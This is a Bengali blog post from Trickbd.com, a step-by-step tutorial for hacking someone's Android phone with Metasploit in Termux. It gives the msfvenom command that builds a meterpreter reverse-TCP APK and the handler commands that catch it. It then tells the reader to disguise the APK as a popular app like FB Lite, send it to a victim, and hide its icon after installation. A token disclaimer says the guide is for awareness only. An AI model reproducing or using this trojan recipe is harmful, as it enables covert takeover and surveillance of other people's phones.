Site icon Trickbd.com

Hack any android phone ? without touching.. | metasploit.. |Termux [Without Root]

Unnamed

আপনাকে ট্রিকবিডিতে স্বাগতম
 

পোস্টের বিষয়ঃ



 ? আমি বলেছিলাম আপনাদের দেখাবো কিভাবে যে কারো Phone Hack করা যায় তার ফোন টাচ না করে.. তো আজকে এই ট্রিক নিয়েই হাজির হলাম.. আপনারা যে কারো ফোনের পুরো এক্সেস নিতে পারবেন.. আপনি ভিক্টিমের ফোনের সবকিছু কন্ট্রোল করতে পারবেন.. এটা শুধুমাত্র আপনাদের জানার জন্য বা জ্ঞান অর্জনের জন্য শিখাচ্ছি..যাতে আপনারা এরকম ফাঁদে পা না দেন.. আপনারে এটি খারাপ কাজে ব্যবহার করবেন না.. আমার আগের পোস্টে আমি দেখিয়েছিলাম আপনারা কিভাবে Metasploit install করবেন.. যারা এখনো Metasploit install করেননি বা জানেননা কিভাবে Metasploit install করতে হয় তারা নিচের লিংক থেকে পোস্টটি দেখে Metasploit install করুন তারপর এই পোস্ট অনুযায়ী কাজ করুন..

Metasploit কিভাবে ইনস্টল করতে হয় দেখতে এখানে ক্লিক করুন..(Freebasics)
Metasploit কিভাবে ইনস্টল করতে হয় দেখতে এখানে ক্লিক করুন..(General)

Command গুলো ফলো করুনঃ


1. ls
2. cd metasploit-framework
3. ls
4. clear

নতুন একটা Session open করে ifconfig কমান্ডটি দিয়ে আপনার ip address টি দেখে নিবেন..

তারপর আগের Session এ এসে নিচের কমান্ডটি দিবেন..ip adress এর জায়গায় আপনার ip address টি দিবেন.. কমান্ডটি দেওয়ার পর কিছুক্ষণ সময় লাগবে payload টি তৈরি হতে..

ruby msfvenom -p android/meterpreter/reverse_tcp LHOST=(ip adress) LPORT=8080 R> /sdcard/hacking.apk

এরপর নতুন একটা session এ গিয়ে নিচের কমান্ডগুলো দিবেন..

ls
cd metasploit-framework
./msfconsole

এখানে metasploit ready হতে একটু সময় লাগবে তারপর নিচের কমান্ডগুলো দিবেন.. ip address এর জায়গায় আপনার ip address টি দিবেন..

set payload android/meterpreter/reverse_tcp
set lhost (ip adress)
set lport 8080
exploit

এরপর আপনার মেমোরিতে গিয়ে দেখবেন hacking.apk নামির একটা app রয়েছে.. ঐটা আপনারা apk editor দিয়ে name & icon চেন্জ করবেন.. এমনভাবে change করবেন যাতে আপনার victim কে পাঠালে সে সেটা install করে.. যেমন এখন fb lite দিয়ে free চলছে.. আপনি সেই app এর মতো করে ঐটার name & icon দিলেন এবং ভিক্টিমকে পাঠাবেন..  মূলকথা victim কে app টি পাঠাতে হবে.. Victim app টি install করে open করলেই তার ফোন হ্যাক হয়ে যাবে..
আপনি চাইলে তারপর আপনার ফোনে কমান্ড দিয়েই তার ফোন থেকে app টি hide করতে পারেন.. এজন্য কমান্ড দিতে হবে..

hide_app_icon

আপনি help লিখে কমান্ড দিলে পুরো লিস্ট চলে আসবে আপনি কোন কমান্ড দিয়ে victim এর কি করতে পারবেন.. এই Command list আপনারা video তে দেখতে পাবেন.. চাইলে দেখে নিতে পারেন কিকি Command আছে বা কিকি করা যায়..

Video :


যাদের বুঝতে সমস্যা হচ্ছে তারা নিচের ভিডিওটি দেখতে পারেন.. Embed করে দিয়েছি… আপনারা যারা freebasics এ visit করছেন তারা নিচে শুধু ফাঁকা জায়গা ছাড়া কিছুই দেখতে পাবেন না.. Freebasics এ video দেখা যায় না.. তাই কেউ দয়া করে বলবেন না ভিডিও কোথায়.. আর ভিডিওর লিংক এখানে চাইবেন না..

এখন এ পর্যন্তই..কষ্ট করে পোস্টটি পড়ার জন্য ধন্যবাদ..
কোনো ভুল হলে ক্ষমা করে দিবেন..সবাই ভালো থাকবেন সুস্থ থাকবেন
যেকোনো সমস্যা আমার Technology বিষয়ক গ্রুপটিতে পোস্ট করে সমাধান পেতে পারেন..

Tech Magician’s BD (Click Here to Join)

যেকোন সমস্যায় ফেসবুকে আমিঃ